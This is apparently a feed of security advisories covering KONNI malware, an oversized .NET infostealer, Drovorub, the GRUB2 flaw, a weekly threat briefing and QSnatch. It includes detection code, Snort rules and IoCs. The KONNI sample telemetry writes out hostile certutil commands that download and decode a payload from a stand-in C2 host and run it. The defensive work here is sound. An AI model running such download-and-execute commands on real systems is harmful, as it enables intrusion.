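        pid = ev["ProcessId"]

        if image == "cmd.exe" and parent in OFFICE:
            findings.append((pid, "office-child"))        # macro spawned a shell
        if image == "cmd.exe" and COPY_CERTUTIL.search(cmd):
            findings.append((pid, "copy-certutil"))       # staging a copy in %TEMP%
        # The rename defeats image-name matching; the PE's OriginalFileName does not change.
        if original == "certutil.exe" and image != "certutil.exe":
            findings.append((pid, "renamed-certutil"))
        if original == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cmd):
            findings.append((pid, "certutil-download"))
        if original == "certutil.exe" and CERTUTIL_DECODE.search(cmd):
            findings.append((pid, "certutil-decode"))
        if image == "cmd.exe" and TEMP_BATCH.search(cmd):
            findings.append((pid, "temp-batch"))
    return findings


def stages_seen(events):
    """Distinct chain stages present, for alerting when several line up on one host."""
    return sorted({stage for _, stage in analyse(events)})


TEMP = r"C:\Users\u\AppData\Local\Temp"
CERTUTIL = r"C:\Windows\System32\certutil.exe"
# Constructed sample telemetry (not captured data): the chain as the advisory
# describes it, plus one benign certutil use that must not fire.
SAMPLE_EVENTS = [
    {"ProcessId": 100, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "OriginalFileName": "Cmd.Exe",
     "CommandLine": f"cmd /c copy {CERTUTIL} {TEMP}\\ct.exe /Y"},
    {"ProcessId": 101, "Image": f"{TEMP}\\ct.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": f"{TEMP}\\ct.exe -urlcache -split -f http://c2.example/stage.txt {TEMP}\\stage.txt"},
    {"ProcessId": 102, "Image": f"{TEMP}\\ct.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": f"{TEMP}\\ct.exe -decode {TEMP}\\stage.txt {TEMP}\\stage.bat"},
    {"ProcessId": 103, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "OriginalFileName": "Cmd.Exe",
     "CommandLine": f"cmd /c del {TEMP}\\stage.txt && {TEMP}\\stage.bat"},
    {"ProcessId": 104, "Image": CERTUTIL, "ParentImage": r"C:\Windows\explorer.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -hashfile C:\Users\u\Downloads\setup.msi SHA256"},
]

if __name__ == "__main__":
    for pid, stage in analyse(SAMPLE_EVENTS):
        print(pid, stage)
    print("stages:", stages_seen(SAMPLE_EVENTS))
```

Matching on OriginalFileName from the PE version resource is what catches the renamed copy; an image-name rule alone would miss it. On a real host, feed in the Sysmon Event ID 1 fields and alert when several distinct stages appear within a short window rather than on any single one.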

MITRE ATT&CK Techniques

According to MITRE, KONNI uses the ATT&CK techniques listed in table 1.

Table 1: KONNI ATT&CK techniques

Technique
Use

System Network Configuration Discovery [T1016]

KONNI can collect the Internet Protocol address from the victim’s machine.

System Owner/User Discovery [T1033]

KONNI can collect the username from the victim’s machine.

Masquerading: Match Legitimate Name or Location [T1036.005]

KONNI creates a shortcut called Anti virus service.lnk in an apparent attempt to masquerade as a legitimate file.

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [T1048.003]

KONNI has used File Transfer Protocol to exfiltrate reconnaissance data out.

Input Capture: Keylogging  [T1056.001]

KONNI has the capability to perform keylogging.

Process Discovery [T1057]

KONNI has used tasklist.exe to get a snapshot of the current processes’ state of the target machine.

Command and Scripting Interpreter: PowerShell [T1059.001]

KONNI used PowerShell to download and execute a specific 64-bit version of the malware.

Command and Scripting Interpreter: Windows Command Shell  [T1059.003]

KONNI has used cmd.exe to execute arbitrary commands on the infected host across different stages of the infection chain.

Indicator Removal on Host: File Deletion [T1070.004]

KONNI can delete files.

Application Layer Protocol: Web Protocols [T1071.001]

KONNI has used Hypertext Transfer Protocol for command and control.

System Information Discovery [T1082]

KONNI can gather the operating system version, architecture information, connected drives, hostname, and computer name from the victim’s machine and has used systeminfo.exe to get a snapshot of the current system state of the target machine.

File and Directory Discovery [T1083]

A version of KONNI searches for filenames created with a previous version of the malware, suggesting different versions targeted the same victims and the versions may work together.

Ingress Tool Transfer [T1105]

KONNI can download files and execute them on the victim’s machine.

Modify Registry [T1112]

KONNI has modified registry keys of ComSysApp service and Svchost on the machine to gain persistence.

Screen Capture [T1113]

KONNI can take screenshots of the victim’s machine.

Clipboard Data [T1115]

KONNI had a feature to steal data from the clipboard.

Data Encoding: Standard Encoding [T1132.001]

KONNI has used a custom base64 key to encode stolen data before exfiltration.

Access Token Manipulation: Create Process with Token [T1134.002]

KONNI has duplicated the token of a high integrity process to spawn an instance of cmd.exe under an impersonated user.

Deobfuscate/Decode Files or Information [T1140]

KONNI has used CertUtil to download and decode base64 encoded strings.

Signed Binary Proxy Execution: Rundll32 [T1218.011]

KONNI has used Rundll32 to execute its loader for privilege escalation purposes.

Event Triggered Execution: Component Object Model Hijacking [T1546.015]

KONNI has modified ComSysApp service to load the malicious DLL payload.

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]

A version of KONNI drops a Windows shortcut into the Startup folder to establish persistence.

Boot or Logon Autostart Execution: Shortcut Modification [T1547.009]

A version of KONNI drops a Windows shortcut on the victim’s machine to establish persistence.

Abuse Elevation Control Mechanism: Bypass User Access Control [T1548.002]

KONNI bypassed User Account Control with the “AlwaysNotify” settings.

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera.

Detection

Signatures

CISA developed the following Snort signatures for use in detecting KONNI malware activity.

alert tcp any any -> any $HTTP_PORTS (msg:"HTTP URI contains '/weget/*.php' (KONNI)"; sid:1; rev:1; flow:established,to_server; content:"/weget/"; http_uri; depth:7; offset:0; fast_pattern; content:".php"; http_uri; distance:0; within:12; content:!"Referrer|3a 20|"; http_header; classtype:http-uri; priority:2; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"KONNI:HTTP header contains 'User-Agent|3a 20|HTTP|0d 0a|'"; sid:1; rev:1; flow:established,to_server; content:"User-Agent|3a 20|HTTP|0d 0a|"; http_header; fast_pattern:only; content:"POST"; nocase; http_method; classtype:http-header; priority:2; metadata:service http;)

alert tcp any any -> any $HTTP_PORTS (msg:"KONNI:HTTP URI contains '/weget/(upload|uploadtm|download)'"; sid:1; rev:1; flow:established,to_server; content:"/weget/"; http_uri; fast_pattern:only; pcre:"/^\/weget\x2f(?:upload|uploadtm|download)\.php/iU"; content:"POST"; http_method; classtype:http-uri; priority:2; reference:url,blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html; metadata:service http;)
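To see what these signatures actually match, the following added example (not code from CISA or the advisories) re-expresses the URI and header checks of the Emotet, LokiBot and KONNI Snort rules on this page in Python and runs them over constructed requests; the hostnames and paths are made up. The flowbits, the Emotet multipart/form-data rule and the LokiBot urilen norm option are left out. One caveat the port makes visible: the first KONNI rule negates a header spelled "Referrer", whereas the standard request header is "Referer", so a request carrying a real Referer header still matches.

```python
"""Added example: the URI and header checks from the CISA Emotet, LokiBot and KONNI
Snort rules, re-expressed in Python and run over constructed HTTP requests.
Hostnames and request contents are made up for illustration."""
import re

# Emotet rules: URI prefix -> urilen bound (urilen:<17 for /wp-content/, <15 for /wp-admin/)
EMOTET_PREFIXES = {"/wp-content/": 17, "/wp-admin/": 15}

# LokiBot pcre (the /U flag means it runs on the normalised URI)
LOKIBOT_RE = re.compile(
    r"/(?:alien|lokyd|donep|jemp|lokey|new2|loki|Charles|sev7n|dbwork|scroll/NW|wrk"
    r"|job|fived?|donemy|animationdkc|love|Masky|vd|lifetn|Ben)/fre\.php$", re.I)

# KONNI third rule pcre: POST to /weget/upload.php, /weget/uploadtm.php or /weget/download.php
KONNI_RE = re.compile(r"^/weget/(?:upload|uploadtm|download)\.php", re.I)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, uri, headers, body).
    Header names keep their case: Snort content matches are case-sensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return method, uri, headers, body


def emotet_uri_hit(method, uri, headers):
    """EMOTET rules: GET, '/wp-content/' or '/wp-admin/' with another '/' within the
    next 4 bytes (distance:0; within:4), a short URI, and 'Connection: Keep-Alive'."""
    if method != "GET" or headers.get("Connection") != "Keep-Alive":
        return False
    for prefix, max_len in EMOTET_PREFIXES.items():
        idx = uri.find(prefix)
        end = idx + len(prefix)
        if idx >= 0 and "/" in uri[end:end + 4] and len(uri) < max_len:
            return True
    return False


def lokibot_uri_hit(method, uri):
    """Lokibot rule: POST, '/fre.php' in the URI, urilen < 50, then the pcre."""
    return method == "POST" and "/fre.php" in uri and len(uri) < 50 and bool(LOKIBOT_RE.search(uri))


def konni_hits(method, uri, headers):
    hits = []
    # Rule 1: '/weget/' at offset 0 and '.php' within the following 12 bytes. The negated
    # header is spelled 'Referrer', so a request with the real 'Referer' header still matches.
    if uri.startswith("/weget/") and ".php" in uri[7:19] and "Referrer" not in headers:
        hits.append("KONNI /weget/*.php")
    # Rule 2: POST with the bare 'User-Agent: HTTP' header value.
    if method == "POST" and headers.get("User-Agent") == "HTTP":
        hits.append("KONNI User-Agent HTTP")
    # Rule 3: POST plus the upload/uploadtm/download pcre.
    if method == "POST" and "/weget/" in uri and KONNI_RE.search(uri):
        hits.append("KONNI /weget/(upload|uploadtm|download)")
    return hits


def classify(raw_request):
    """Names of the rules above that the request would trigger (flowbits ignored)."""
    method, uri, headers, _body = parse_request(raw_request)
    hits = []
    if emotet_uri_hit(method, uri, headers):
        hits.append("EMOTET wp uri")
    if lokibot_uri_hit(method, uri):
        hits.append("Lokibot /fre.php")
    hits.extend(konni_hits(method, uri, headers))
    return hits


# Constructed requests (not captured traffic)
SAMPLES = {
    "emotet": "GET /wp-content/xy/ HTTP/1.1\r\nHost: www.example\r\nConnection: Keep-Alive\r\n\r\n",
    "lokibot": "POST /alien/fre.php HTTP/1.1\r\nHost: c2.example\r\nContent-Type: application/octet-stream\r\n\r\n",
    "konni": "POST /weget/upload.php HTTP/1.1\r\nHost: c2.example\r\nUser-Agent: HTTP\r\n\r\n",
    "konni_referer": "GET /weget/x.php HTTP/1.1\r\nHost: c2.example\r\nReferer: http://c2.example/\r\n\r\n",
    "benign": "GET /wp-content/uploads/2020/09/logo.png HTTP/1.1\r\nHost: www.example\r\nConnection: Keep-Alive\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:14s} -> {classify(raw) or 'no match'}")
```

The benign WordPress request shows why the Emotet rules lean on urilen and the short directory component: a normal /wp-content/uploads/... path is far longer than 16 bytes and never carries a second slash within four bytes of the prefix.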

Mitigations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

Maintain up-to-date antivirus signatures and engines. See Protecting Against Malicious Code.
Keep operating system patches up to date. See Understanding Patches and Software Updates.
Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.
Enforce a strong password policy. See Choosing and Protecting Passwords.
Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
Scan all software downloaded from the internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate access control lists.
Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.

For additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, “Guide to Malware Incident Prevention and Handling for Desktops and Laptops.”

Resources

d-hunter – A Look Into KONNI 2019 Campaign
MITRE ATT&CK – KONNI
MITRE ATT&CK for Enterprise
Revisions
August 14, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

One of our readers, Lukas, shared an unusual malicious executable with us earlier this week – one that was 130 MB in size. Making executables extremely large is not an uncommon technique among malware authors[1], as it allows them to easily avoid detection by most AV solutions, since the size of files which AVs will check is usually fairly low (tens of megabytes at most). In order to increase the size of their creations, malware authors commonly embed images in the executables or include large chunks of “empty space” (i.e. null bytes) in them.

The authors of our executable, which turned out to be a Visual Basic .NET application originally called cvcv.exe, decided to use both techniques. They embedded 54 GIFs (or rather one GIF, which you may see below, with a healthy 1.12 MB size, 54 times) among the resources of the application and added more than 75 MB of null bytes after the end of the executable.

If all of this unnecessarily filled space was freed, the 130 MB executable would be just over 260 kB in size. The story doesn’t end there though.
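A triage check for the padding trick just described, added here as an example (not the diary author's tooling): it parses the PE section table to find where the image really ends, then measures how much of the data appended after it (the overlay) is nothing but null bytes. It only sees the appended padding; resources embedded inside sections, like the repeated GIF, are not counted. The minimal PE used as input is constructed inline.

```python
"""Measure trailing null-byte padding on a PE file, the inflation technique
used to push executables past the size limits of AV scanners."""
import struct

def pe_end_of_sections(data: bytes) -> int:
    """Return the file offset where the last raw section ends."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                     # COFF file header follows the signature
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    sect_table = coff + 20 + opt_size       # 20-byte COFF header + optional header
    end = sect_table + 40 * num_sections    # headers at the very least
    for i in range(num_sections):
        entry = sect_table + 40 * i
        # SizeOfRawData and PointerToRawData sit at +16 and +20 of each entry.
        size_raw, ptr_raw = struct.unpack_from("<II", data, entry + 16)
        end = max(end, ptr_raw + size_raw)
    return end

def overlay_report(data: bytes) -> dict:
    """Summarise overlay size, trailing null bytes and the size without them."""
    end = pe_end_of_sections(data)
    overlay = data[end:]
    trailing_nulls = len(overlay) - len(overlay.rstrip(b"\0"))
    return {
        "file_size": len(data),
        "sections_end": end,
        "overlay_size": len(overlay),
        "trailing_null_bytes": trailing_nulls,
        "size_without_padding": len(data) - trailing_nulls,
        "padding_ratio": trailing_nulls / len(data) if data else 0.0,
    }

def build_sample_pe(null_padding: int) -> bytes:
    """Constructed minimal PE32 with one section, then null_padding bytes of 0x00."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0                         # standard PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)  # only magic set
    raw_ptr, raw_size = 0x200, 0x200
    section = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", raw_size, 0x1000, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + optional + section).ljust(raw_ptr, b"\0")
    body = bytes(range(256)) * (raw_size // 256)   # non-null section content
    return headers + body + b"\0" * null_padding

if __name__ == "__main__":
    print(overlay_report(build_sample_pe(0x1000)))
```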

.NET malware can sometimes be quite unpleasant and difficult to analyze, but after a while it became clear that our executable used only elementary name obfuscation, so it wasn’t too hard to get to the bottom of what it was supposed to do. The entire massive file turned out to be a simple injector for a second-stage payload: another VB .NET executable, originally called j.exe, with a much smaller size of 24 kB.

This second executable was embedded (in an encrypted form) as another resource in the original EXE. After the massive application was executed, it would wait for 35 seconds, decrypt the second executable/payload using a simple XOR-based algorithm and then launch it.

The smaller executable surprisingly turned out to be a bit more complex than the large one. After it was executed, it would first ensure that the malware remained persistent. Doubly so: it would copy the original massive file to the Start Menu Startup folder as “77e41643eabac0c55a13f8b8e793e845.exe” and to the AppData folder as “jossej.exe”. It would also create a new value in the registry (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run) which would ensure that the latter file was executed at startup as well. It would then run the jossej executable, which would reconfigure internet security zones and add an allow rule for itself to the Windows firewall.

The malicious process would then try to contact a server at the (DDNS) domain lexy[.]hopto[.]org.

The domain was inaccessible at the time of the analysis, so we can’t be completely sure what communication would follow. Going by the contents of the executable, however, it would seem that the malware is supposed to function mainly as an infostealer/keylogger.

This would more or less agree with the results for the sample on VirusTotal, according to which most AVs detect the file as a version of the Razy Trojan[2].

The following chart shows a summary of the main activities performed by the malware. As we may see, it is nowhere near as complex as it could have been for a 130 MB executable.


Indicators of Compromise (IoCs)

cvcv.exe / jossej.exe / 77e41643eabac0c55a13f8b8e793e845.exe (130 MB)
MD5 – f1c3d28ebaf180367591fa5d31e3febf
SHA1 – b1cfa019684fcd293eeca557aa523312837ea37d

j.exe (24 kB)
MD5 – 9690a3f2a3d0f84244d41e4aefae0a16
SHA1 – 4631ba4467eee1380f0e847c4f56dddbaed7196c


[1] https://isc.sans.edu/forums/diary/Picks+of+2019+malware+the+large+the+small+and+the+one+full+of+null+bytes/25718/
[2] https://www.virustotal.com/gui/file/5bf3830d0da0283fcdc2ab8183ab280458ab3638d1cae64a2b758208b77c52fa/detection

———–
Jan Kopriva, @jk0pr, Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Original release date: August 13, 2020

The National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) have released a cybersecurity advisory introducing previously undisclosed Russian malware. NSA and the FBI attributed the malware, dubbed Drovorub, to Russian advanced persistent threat (APT) actors.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the joint advisory and employ its detection techniques and mitigations.

This product is provided subject to this Notification and this Privacy & Use policy.

A severe vulnerability exists in almost all signed versions of GRUB2, which is used by most Linux systems. If properly exploited, it would allow attackers to compromise the system boot process, even when the «Secure Boot» verification mechanism is active.

The flaw was reported by Eclypsium on July 29, although the associated CVE-2020-10713 is dated March 20, and while grub2 is more directly associated with Linux systems, machines with dual (or multiple) boot open the door to exploitation against other systems such as Windows.

A flaw was found in grub2 versions prior to 2.06. An attacker can use the flaw in GRUB 2 to hijack and tamper with the GRUB verification process. This flaw also allows the Secure Boot protections to be bypassed. In order to load an untrusted or modified kernel, an attacker would first need to gain access to the system, such as obtaining physical access, being able to alter a «pxe-boot» network, or having remote access to a networked system with root access. With this access, an attacker could forge a string to cause a buffer overflow by injecting a malicious payload, leading to arbitrary code execution within GRUB. The highest threat from this vulnerability is to data confidentiality and integrity, as well as system availability.

https://cve.mitre.org/cgi-bin//cvename.cgi?name=CVE-2020-10713

According to the BleepingComputer report, the vulnerability has been shared with operating system vendors, computer manufacturers and CERTs/CSIRTs. Advisories and possible mitigations from multiple organizations in the industry are expected to be published today.

We consider the problem to have a low probability of occurrence, or at least a high degree of difficulty, since, as stated in the CVE quote, special conditions are required to exploit the vulnerability. This does not mean we can stop worrying; rather, we must keep a close eye on the updates that will be arriving from the different vendors.

The various threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Data breach, Cobalt Strike, Lazarus, Misconfigured Tools, and OilRig. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity.

Figure 1 – IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Cerberus Banking Trojan Team Breaks Up, Source Code Goes to Auction

(published: July 27, 2020)

The Android banking trojan Cerberus has been put up for sale by the malware’s developer. The trojan, which uses overlays to phish banking credentials from users, has been listed with a starting price of $50,000. The operator of Cerberus claims the purchaser will receive the source code, module code, admin panel code, along with the current customer database with a monthly profit of $10,000. The sale of Cerberus is allegedly due to the development team breaking up.
Recommendation: Users should be cautious when downloading Android applications, as malicious apps occasionally bypass Google Play Store protections. It is crucial that all permissions of an application be examined prior to download.
Tags: Android Malware, Cerberus, Mobile Malware

Source Code from Dozens of Companies Leaked Online

(published: July 27, 2020)

Source code from a wide range of companies has been leaked due to misconfigured tools. Identified by Tillie Kottmann, the companies include Adobe, Disney, Lenovo, Microsoft, Motorola and Nintendo, among many others. Within the source code, developers’ names along with hardcoded credentials have been found.
Recommendation: It is crucial for your company to verify that access control is configured correctly prior to adding any sensitive data. As this story portrays, misconfigured software can cause leaks of sensitive information, which could be used for further malicious activity and cause significant harm to a company’s reputation.
Tags: Misconfigured tools, Data breach

Dave Data Breach Affects 7.5 Million Users, Leaked on Hacker Forum

(published: July 26, 2020)

Dave, a fintech company that offers overdraft protection, has suffered a data breach. The breach occurred when threat actors gained access to third-party provider Waydev, which enabled access to user data at Dave. The database contained over seven million user records, which included addresses, birth dates, email addresses, names, and phone numbers. The actor who stole the database first attempted to sell it on a hacker forum; however, they ended up releasing the database for free on another site.
Recommendation: Dave is requiring all users to reset their passwords; however, users need to be aware that they are still at risk if they use the same password for other sites as well.
Tags: Data breach, PII, Third party breach

Russia’s GRU Hackers Hit US Government and Energy Targets

(published: July 24, 2020)

The Federal Bureau of Investigation (FBI) and FireEye have both confirmed a series of campaigns by the Russian GRU-associated APT28, aka Fancy Bear. These attacks began in December 2018 and continued until at least May 2020. The initial vector appears to be spearphishing attacks against a number of US Government, energy, and education organizations. One confirmed victim did not find any evidence of successful phishing but did confirm that attackers had stolen multiple mailboxes from their email servers. Other initial attack vectors include password spraying and brute force. The long-term motivation behind these attacks is not clear, but they are likely a variation of the past motives of APT28, including US election meddling and retaliatory attacks against the Olympic Anti-Doping Agency. The broadening of attacks to the US Energy Sector is especially troubling, as APT28 is believed to have been behind previous attacks against US and Ukrainian energy infrastructure and Industrial Control Systems (ICS).
Recommendation: Defense in depth, along with well-designed and regular employee training, is critical to all businesses but especially important for governments and industries. Entities responsible for ICS systems need to be aware of the security issues and vulnerabilities in these systems, and they should never be connected to the internet.
Tags: APT28, FancyBear, government, energy sector, spear-phishing

Chinese DJI Drones Come With Backdoor

(published: July 24, 2020)

Researchers from Synacktiv and GRIMM have released reports detailing security issues found within the DJI drone app. Developed by Chinese drone manufacturer Da Jiang Innovations, the app comes with an auto-update function that bypasses the Google Play Store; this function could be used to install malicious software on an Android device and send sensitive information directly to DJI’s servers. The app requests significant permissions (contacts, microphone, camera, location, storage, change network connectivity) and collects a user’s IMSI, IMEI and the serial number of the SIM card used; arguably the servers have almost full control of a user’s phone, exhibiting similarities to a malware C&C server. The app also uses anti-debugging and encryption techniques to hinder security researchers. DJI has disputed these claims, calling the findings “typical software concerns” and arguing that the US DHS had found no evidence of suspicious data transmission.
Recommendation: All applications should be carefully researched prior to installing on a personal or work machine. Applications that request additional permissions upon installation should be carefully vetted prior to allowing permissions. Additionally, all applications, especially free versions, should only be downloaded from trusted vendors.
Tags: Android, drone, backdoor

Garmin Suffers Potential Ransomware Attack

(published: July 24, 2020)

Garmin’s services and applications have been experiencing outages over the previous week, and reports of a ransomware attack are beginning to surface. Garmin confirmed that its website and mobile app were both down while also sending notes to its Taiwanese factories that there would be “two days of planned maintenance.” Researchers from SentinelOne noticed that these outages appeared to correlate with a WastedLocker attack against the company; several employees likewise alleged that Garmin had suffered an attack from WastedLocker. WastedLocker is ransomware believed to have been developed by the Russian group Evil Corp, better known for their Dridex and Bitpaymer attacks. Garmin has currently not commented on a potential attack.
Recommendation: Educate your employees on the risks of opening attachments from unknown senders. Anti-spam and antivirus applications provided by trusted vendors should also be employed. Emails that are received from unknown senders should be carefully avoided, and attachments from such senders should not be opened. Furthermore, it is important to have a comprehensive and tested backup solution in place, in addition to a business continuity plan for the unfortunate case of ransomware infection.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact – T1486
Tags: Garmin, ransomware, Evil Corp, WastedLocker, cybercrime

MATA: Multi-platform Targeted Malware Framework

(published: July 22, 2020)

Security researchers from Kaspersky have identified a new malware framework called “MATA” that targets Windows, Linux, and macOS operating systems. Researchers believe the malware framework is linked to the North Korea-based Lazarus APT group. The framework has been used by the threat actors since April 2018 and has targeted entities in Poland, Germany, Turkey, Korea, Japan, and India. The targeted industries include a software company, an e-commerce provider, and an Internet Service Provider (ISP). The actors used MATA to perform various objectives on their victims, such as distributing VHD ransomware and querying victim databases to acquire customer lists. Analysis revealed that a variant of Manuscrypt malware distributed by Lazarus also shares a similar configuration structure with MATA.
Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.
Tags: Lazarus, MATA

OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory

(published: July 22, 2020)

Palo Alto’s Unit42 discovered a variant of an OilRig-associated tool we call RDAT using a novel email-based command and control (C2) channel that relied on a technique known as steganography to hide commands and data within bitmap images attached to emails.
Recommendation: Defense-in-depth is the best way to ensure safety from APTs. Defense-in-depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff, and robust threat intelligence capabilities.
Tags: OilRig, Middle East, Email, C2

Chinese APT Targets India and Hong Kong with Updated MgBot

(published: July 21, 2020)

Researchers from Malwarebytes have released a report detailing the targeting of Indian and Hong Kong entities by an unnamed Chinese APT group. A spearphishing campaign spoofing an email from the Indian Government Information Security Center was observed targeting Indian government personnel. Once the attached .rar file was downloaded, it would inject a Cobalt Strike variant into the system. Other lure documents themed around Hong Kong immigration to the UK were discovered dropping an updated MgBot loader before injecting a Remote Access Trojan (RAT) through the AppMgmt Service on Windows. The RAT’s strings are either obfuscated or use XOR encoding, making analysis difficult. The targeting by a Chinese APT is likely due to the current climate between China and India as well as the political tensions in Hong Kong. Malwarebytes believes the actor shares TTPs with well-known Chinese groups such as Rancor, KeyBoy, and APT40; while still not offering attribution, the analysts believe this APT group has been active since 2014, continuously using variants of MgBot throughout.
Recommendation: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.
MITRE ATT&CK: [MITRE PRE-ATT&CK] Spearphishing for Information – T1397 | [MITRE ATT&CK] Access Token Manipulation – T1134 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] BITS Jobs – T1197 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] Data from Local System – T1005 | [MITRE ATT&CK] Exploitation for Privilege Escalation – T1068 | [MITRE ATT&CK] Network Service Scanning – T1046 | [MITRE ATT&CK] Obfuscated Files or Information – T1027
Tags: China, APT, MgBot, Cobalt Strike, India, Hong Kong, spearphishing, lure

Golden Chickens: Evolution Of The MaaS

(published: July 20, 2020)

Researchers from QuoIntelligence observed four new attacks throughout March and April utilizing the tools of the e-crime group Golden Chickens, who provide Malware-as-a-Service (MaaS). Researchers attributed each attack, with confidence varying from low to moderate, to the groups GC05, GC06.tmp, and FIN6. During the analysis, it was found that the Golden Chickens group has updated its tools such as TerraLoader, more_eggs, and VenomLNK with new features that incorporate anti-analysis techniques, new string obfuscation and a brute force implementation. Golden Chickens MaaS remains a preferred service provider for top-tier e-crime groups such as FIN6 and Cobalt Group.
Recommendation: Financially themed malspam emails are a common tactic among threat actors; therefore, it is crucial that your employees are aware of their financial institutions’ policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document with a sense of urgency, and poor grammar, are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.
MITRE ATT&CK: [MITRE ATT&CK] Regsvr32 – T1117 | [MITRE ATT&CK] Code Signing – T1116 | [MITRE ATT&CK] Obfuscated Files or Information – T1027 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information – T1140 | [MITRE ATT&CK] Scheduled Task – T1053 | [MITRE ATT&CK] System Information Discovery – T1082 | [MITRE ATT&CK] System Network Configuration Discovery – T1016 | [MITRE ATT&CK] System Owner/User Discovery – T1033 | [MITRE ATT&CK] Remote File Copy – T1105 | [MITRE ATT&CK] Commonly Used Port – T1043 | [MITRE ATT&CK] Standard Application Layer Protocol – T1071 | [MITRE ATT&CK] Standard Cryptographic Protocol – T1032 | [MITRE ATT&CK] Exfiltration Over Command and Control Channel – T1041 | [MITRE ATT&CK] User Execution – T1204 | [MITRE ATT&CK] Command-Line Interface – T1059 | [MITRE ATT&CK] CMSTP – T1191
Tags: TerraLoader, Golden Chickens

Original release date: July 27, 2020

Summary

This is a joint alert from the United States Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC).

CISA and NCSC are investigating a strain of malware known as QSnatch, which attackers used in late 2019 to target Network Attached Storage (NAS) devices manufactured by the firm QNAP.  

All QNAP NAS devices are potentially vulnerable to QSnatch malware if not updated with the latest security fixes. The malware, documented in open-source reports, has infected thousands of devices worldwide with a particularly high number of infections in North America and Europe. Further, once a device has been infected, attackers can prevent administrators from successfully running firmware updates.

This alert summarizes the findings of CISA and NCSC analysis and provides mitigation advice.

Technical Details

Campaigns

CISA and NCSC have identified two campaigns of activity for QSnatch malware. The first campaign likely began in early 2014 and continued until mid-2017, while the second started in late 2018 and was still active in late 2019. The two campaigns are distinguished by the initial payload used as well as some differences in capabilities. This alert focuses on the second campaign as it is the most recent threat.  

